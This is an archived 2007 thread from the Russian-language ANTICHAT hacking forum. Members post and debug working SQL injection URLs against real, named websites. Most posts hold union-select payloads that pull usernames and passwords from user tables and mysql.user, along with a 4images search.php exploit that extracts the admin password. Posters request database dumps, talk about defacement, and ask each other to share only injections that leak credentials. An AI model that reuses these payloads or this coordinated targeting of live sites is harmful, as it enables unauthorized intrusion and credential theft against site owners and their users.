ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.02.2007, 22:47
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от злюка
мыльники тоже выводятся, так что хорошая база..да и словарик мона составить  ...мда а через админку управление сайтом..чувствую пахнет дефейсом вы добраоись до админки? Сделайте дамп плиз
|
|
|
09.02.2007, 22:56
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
PHP код:
http://arsenal.timglass.co.uk/viewnews.php?newsid=65'
http://www.vestingstadfm.nl/viewnews.php?newsid=24'
http://paxar.bc.ca/viewnews.php?newsID=13'
http://www.newdirect.ru/ibase/index.php?page=brd&id=9'
http://www.lichr.ee/new/index.php?page=3'
http://www.mzss.hr/index.cgi?menu_id=46'
Последний раз редактировалось ~!DoK_tOR!~; 09.02.2007 в 23:20..
|
|
|
|
10.02.2007, 00:48
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от }{0TT@БЬ)Ч
http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10+from+t_users/*
Кто сменил юзера? стукни в асю пообщаемся.
Последний раз редактировалось }{0TT@БЬ)Ч; 16.02.2007 в 01:38..
|
|
|
|
08.02.2007, 22:28
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810
Репутация:
56
|
|
SQL -ihj в 4 images
вот сплойт
Код:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
user_password%20from%204images_users%20where%20user_name=%2527ADMIN
вот сайт:http://www.sashapivovarova.com/galleryfans
подстовляю сплойт и ничего не происходит |
|
|
|
09.02.2007, 05:42
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул
Код:
http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*
http://digitalfx.ru/index.php?newsid=1146316404'
|
|
|
|
09.02.2007, 06:33
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от Thanat0z
что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул
Код:
http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*
http://digitalfx.ru/index.php?newsid=1146316404'
Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*
а http://www.e-financialconsulting.com 4ё-то у меня не грузится вообще =\
|
|
|
|
09.02.2007, 06:52
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от ice1k
Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*
хм...я как-то так делал что оно мне говорило
Юзеру такому-то запрешен СЕЛЕКТ с базы.
http://www.synergisticresearch.com/
У тебя конструкция concat(user(),char(58),password()) прошла?
|
|
|
|
09.02.2007, 06:44
|
|
Новичок
Регистрация: 17.11.2006
Сообщений: 22
Провел на форуме:
70150
Репутация:
1
|
|
Чет немогу понять :/
http://www.nybmwcca.org/events.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
а вот это ваще хрень
http://www.nybmwcca.org/events.php?id=1+union+select+concat(user,char(58), password)+from%20+mysql.user/*
|
|
|
|
09.02.2007, 10:56
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user (1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'
|
|
|
|
09.02.2007, 14:23
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от _GaLs_
_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user (1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'
не выкладывай плиз инъекции где нельзя выводить полезную инфу (юзер,пасс), а то и так перебирать много
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид